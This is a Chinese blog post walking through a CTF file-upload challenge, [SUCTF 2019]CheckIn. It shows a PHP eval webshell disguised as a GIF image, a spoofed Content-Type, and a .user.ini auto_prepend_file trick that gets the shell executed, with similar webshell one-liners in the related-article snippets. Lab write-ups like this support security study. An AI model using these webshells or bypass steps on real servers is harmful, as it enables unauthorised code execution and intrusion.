[SUCTF 2019]CheckIn

已于 2024-04-18 22:26:42 修改
阅读量159 收藏
点赞数 2
分类专栏: 网络安全 buuctf 文章标签: 网络安全 php
于 2024-04-18 22:06:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65279640/article/details/137939557
版权

           题解

.user.ini文件

题解

打开网站,发现又是文件上传,感觉不会太简单。

先正常上传php一句话木马文件试试

出现illegal suffix!,去翻译了一下发现,意思是非法后缀。

接着尝试图片码。

好好好,又把<?过滤掉了,那我们使用

<script language='php'>eval($_POST['123']);</script>

来写一句话木马

有提示说不是图片类型,那我们在伪造一个图片头

加入GIF89a

成功上传,放包

记着回显的信息,之后尝试上传.htaccess试试

 Your dir uploads/1254adea244b6ef09ecedbb729f6c397 
Your files : 
array(2) { [0]=> string(9) "index.php" [1]=> string(10) "shell.jpg" }

提示说不是图片类型

抓包进行修改

Content-Type:为images/jpeg

在文件头中加入GIF89a

之后访问刚刚上传的图片发现根本访问不到我们刚上传的图片,懵逼,怎么回事???!!!

之后看了大佬的笔记,发现用的并不是.htaccess文件来解析的图片码,而是使用的user.ini来解析的图片码。

那么我们现在直接编辑一个.user.ini文件。

GIF89a 
auto_prepend_file=shell.jpg

之后访问index.php,让index.php解析我们的Script代码即可。之后进行蚁剑连接即可

.user.ini文件

像了解.user.ini文件的可以去看这篇博客    文件上传漏洞中的.user.ini文件-CSDN博客

masa010
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 6100
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
BUUCTF [SUCTF 2019]CheckIn
qq_42158602的博客
02-07 1590
拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功 发现添加图片头文件就可以绕过 GIF89a 上传php文件的时候发现过滤了<? 绕过检测 <script language='php'></script> 构造图片马 GIF89a <script language='php'>eval($_GET['...
buuctf-SUCTF 2019 CheckIn(小宇特详解)
小宇的web博客
01-22 2825
buuctf-SUCTF 2019 CheckIn(小宇特详解) 咋一看这是一道文件上传 这里先尝试一下上传一个php文件 里面写一个最简单的一句话木马就行 <?php eval(@$_POST['shell']);?> 上传试试 回显illegal suffix!(非法后缀) 这里尝试一下修改文件拓展名php5,phtml,等都没有成功 然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀) 这里我上传一张jpg 回显<? in conten
SUCTF2019 CheckIn
segogt的博客
11-28 648
对文件后缀的黑名单匹配 通过上传配置文件.user.ini绕过 .user.ini auto_prepend_file:指定的文件能够在主文件执行前自动被解析。 auto_append_file:指定的文件的内容在主文件执行后自动被解析 如果php脚本使用了exit()中断退出,auto_append_file就不会被执行 于是可以通过上传.user.ini,然后再上传一个指定的文件,文件...
checkin
03-18
【标题】:“checkin”项目解析 【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,...
glados_checkin
03-25
glados定时签到
checkin-system
05-19
2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获...
checkin-ncku
05-21
checkin-nckuFeature打卡完截屏并寄到信箱每天随机打卡依据上班时间,在合法时间内进行随机下班打卡依据假期日,跳过打卡日期Install yarn installUsage填入所需的帐户资讯到credential.json cp credential-template...
checkin-alert
04-02
基础导轨 标准工作流程 设置项目: bin/setup 通过运行bin/server启动Web bin/server 。 导航到您的实时应用程序。 在工作时,请记住导航到/git并在工作时经常提交。
tongji_checkin
03-04
【同济大学健康打卡自动脚本--GitAction版】是一个基于Python编程语言的自动化工具,专为同济大学的学生或教职工设计,旨在简化每日的健康打卡流程。此脚本利用了GitAction,一个GitHub的动作(Actions)服务,使得...
daily_checkin.zip
01-07
【标题】"daily_checkin.zip" 是一个包含脚本的压缩包,用于自动完成天翼云的每日签到任务,并且据描述在2022年1月7日时已经经过了测试,证明是可用的。这个压缩包可能对那些需要定期在天翼云平台签到并领取额外存储...
hence-flight-checkin
05-06
link rel =" import " href =" bower_components/hence-flight-checkin/hence-flight-checkin.html " >发展所有开发都是利用/ src和/ test文件夹中的文件进行的。依存关系元素依赖关系通过NPM& 进行管理。 您...
southwest-checkin-3
03-14
西南签到3.X 自动检查乘客的西南航班。 第3版是v2的升级版本,以通过Heroku托管的最新...由非Rails人员针对Ruby 2.6.3,Rails 5.2.3更新获取签到源git clone https://github.com/davidkassa/southwest-checkin-3.gitcd
checkin:阿拉斯普兰斯
06-30
"checkin-master"这个压缩包文件名可能是项目源代码的主分支或者主目录,暗示着它包含了整个应用的源代码。在解压后,我们可能会找到以下常见的文件和文件夹结构: 1. `index.html`:主HTML文件,定义了网页的结构...
genshin-daily-checkin
04-23
怎么跑 在Docker Swarm上运行 例子: docker service create --name genshin-daily-login truong996/genshin-daily-login 仅运行Docker docker run -d truong996/genshin-daily-login
checkin_profile_back
04-11
渡槽测试在本地运行应用程序从此目录运行aqueduct serve以运行应用程序。 要在IDE中运行,请运行bin/main.dart 。 默认情况下,将使用名为config.yaml的配置文件。 要生成SwaggerUI客户端,请运行aqueduct document ...
sau-class-checkin
04-02
关于 这是一个脚本,如果设置正确,它将告诉SAU您的位置 因为大多数课程都是在一个小时开始的,并且一个好学生应该在该时间之前到达并办理登机手续,所以脚本会设法解决这个问题。 如果您在一个小时的更改前5分钟...
Basecamp Checkin Reminder-crx插件
04-03
语言:English 简单的扩展程序在4:30打开Basecamp Basecamp通知有时会失败,许多用户忘记填写他们的签到位置。 此扩展程序会在指定时间自动在新窗口中打开Basecamp,以作为提醒。
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值